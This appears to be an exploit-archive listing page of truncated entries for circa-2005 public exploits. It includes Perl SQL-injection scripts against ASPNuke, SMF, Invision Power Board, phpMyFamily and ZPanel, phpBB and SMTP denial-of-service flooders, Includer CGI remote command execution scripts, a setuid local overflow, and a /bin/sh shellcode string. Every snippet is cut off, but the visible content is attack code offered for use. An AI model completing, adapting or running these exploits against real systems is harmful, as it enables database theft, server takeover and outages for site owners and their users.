[badroot security] Community link pro web editor: Remote command Execution

BADROOT SECURITY GROUP Security Advisory 2005-0x05 http://www.badroot.org irc.us.azzurra.org badroot - - - - - - - - - - - - - - - - - - - - - - - - - Authors ....... spher3 spher3 at fatalimpulse dot net mozako admin at fatalimpulse dot net Date...

ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit

Exploit for unknown platform in category web applications ======================================================== ASPNuke = 0.80 commentpost.asp SQL Injection Exploit ======================================================== !/usr/bin/perl -w SQL Injection Exploit for ASPNuke = 0.80 This exploit...

NsT-phpBBDoS.pl.txt

!/usr/bin/perl Name: NsT-phpBBDoS Perl Version Copyright: Neo Security Team Author: HaCkZaTaN Ported: g30rg3x Date: 20/06/05 Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3x A Simple phpBB Registration And Search DoS Flooder. g30rg3x@neosecurity:/home/g30rg3x perl NsT-phpBBDoS.pl...

phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code)

Exploit for unknown platform in category dos / poc ===================================================================== phpBB = 2.0.15 Register Multiple Users Denial of Service perl code ===================================================================== !/usr/bin/perl Name: NsT-phpBBDoS Perl...

Simple Machines Forum &lt;= 1.0.4 (modify) SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w SMF Modify SQL Injection // All Versions // By James http://www.gulftech.org Simple proof of concept for the modify post SQL Injection issue I discovered in Simple Machine Forums. Supply this script with your username password and the complete...

pafaq.pl.txt

!/usr/bin/perl -w paFaq 1.0 Add Administrator PoC // By James // http://www.gulftech.org use LWP::UserAgent; Set up the LWP User Agent $ua = new LWP::UserAgent; $ua-agent"paFaq Hash Grabber v1.0"; if !$ARGV0 print "Usage : pafaq.pl http://path/to/pafaq"; exit; my $keytime = time; my $dbmpath =...

GoodTech SMTP Server 5.14 - Denial of Service

GoodTech SMTP Server 5.14 - Denial of Service ===== Start GoodTechSMTPServerDOS.pl ===== Usage: GoodTechSMTPServerDOS.pl GoodTechSMTPServerDOS.pl 127.0.0.1 GoodTech SMTP Server for Windows NT/2000/XP version 5.14 Download: http://www.goodtechsys.com/ use IO::Socket; use strict; my$socket = ""; if...

xpl_detail.pl.txt

This is a multi-part message in MIME format. ------=NextPart000003201C5473D.B3E3E000 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable http://icis.digitalparadox.org/exploits/xpldetail.pl =20 !/usr/bin/perl use IO::Socket; use Getopt::Std; print "xASP NUKE...

comasp.pl.txt

This is a multi-part message in MIME format. ------=NextPart000003901C5473D.C6C4A380 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable =20 !/usr/bin/perl use IO::Socket; use Getopt::Std; print "xASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n"...

5BP0D00FPI.pl.txt

!/usr/bin/perl -w Exploit generated by beSTORM on 2005-05-10 12:45 All Rights Reserved - Copyright tm use IO::Socket; use strict; my $target = shift; my $printusage = 0; if !$target usage; print "No target has been supplied, reverting to 192.168.1.52.\n"; $target = "192.168.1.52"; print "Will...

r57zpanel.pl.txt

!/usr/bin/perl use LWP::UserAgent; ZPanel Ver. 2.5- Public BETA 2 Release date: 1/15/2005 sql injection exploit with one char bruteforce work on all mysql versions -------------------------------------------------------- example: r57zpanel.pl http://192.168.0.1/zpanel/index.php admin PATH :...

Invision Power Board <= 2.0.3 Login.PHP SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= Invision Power Board agent"Mosiac 1.0" . $ua-agent; if !$ARGV0 $ARGV0 = ''; if !$ARGV3 $ARGV3 = ''; my $path = $ARGV0 . '/index.php?act=Login&CODE=autologin'; my $user = $ARGV1;...

ARPUS/Ce Local Overflow Exploit (setuid) (perl)

Exploit for linux platform in category local exploits =============================================== ARPUS/Ce Local Overflow Exploit setuid perl =============================================== !/usr/bin/perl -w Setuid ARPUS/ce exploit by KF - kflistsatdigitalmunitiondotcom - 4/21/05 Copyright...

aeon02a.pl.txt

!/usr/bin/perl Aeon-mail relay agent for Linux written by lammat just for practice purposes tested against aeon-0.2a http://grpower.ath.cx [email protected] execve/bin/sh for linux x86 29 bytes by Matias Sedalo $shellcode = "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"...

The Includer CGI &lt;= 1.0 Remote Command Execution (new version)

No description provided by source. !/usr/bin/perl Target - The Includer CGI = 1.0 Based on - http://www.milw0rm.com/id.php?id=862 Info about bug - Stupid use "Open" function. If you want know more visit our home page at nst.void.ru use IO::Socket; if @ARGV 3 print " \n Includer CGI = 1.0 Network...

The Includer CGI <= 1.0 Remote Command Execution (new version2)

Exploit for cgi platform in category web applications =============================================================== The Includer CGI .\n"; print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n"; exit; if @ARGV 3 Usage; $host = @ARGV0; $pa...

The Includer CGI 1.0 - Remote Command Execution (3)

The Includer CGI 1.0 - Remote Command Execution 3 !/usr/bin/perl K-C0d3r Includer.cgi 1.0 remote command execution K-C0d3r C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend! I think the bug was discovered by Francisco Alisson. Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm. FK of to al...

phpBB 2.0.13 - downloads.php mod Get Hash

phpBB 2.0.13 - downloads.php mod Get Hash !/usr/bin/perl -w use IO::Socket; Example: C:\phpbb.pl www.site.com /phpBB2/ 2 downloads.php mod in phpBB \n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " - site address\n"; print " - forum folder\n"; print " - user id 2 default for phpBB...

phpMyFamily 1.4.0 - SQL Injection

phpMyFamily 1.4.0 - SQL Injection !/usr/bin/perl -w phpMyFamily Exploit injection ============================== $banner = "phpMyFamily Exploit injection \n\n============================== \n\nINFGPG-Hacking&Security Research"; Greats: AresU 1st IndoSec Team,ADZ Security Team has discovered bugs...

phpMyFamily &lt;= 1.4.0 SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w phpMyFamily Exploit injection ============================== $banner = "phpMyFamily Exploit injection \n\n============================== \n\nINFGPG-Hacking&Security Research"; Greats: AresU 1st IndoSec Team,ADZ Security Team has discovered bugs...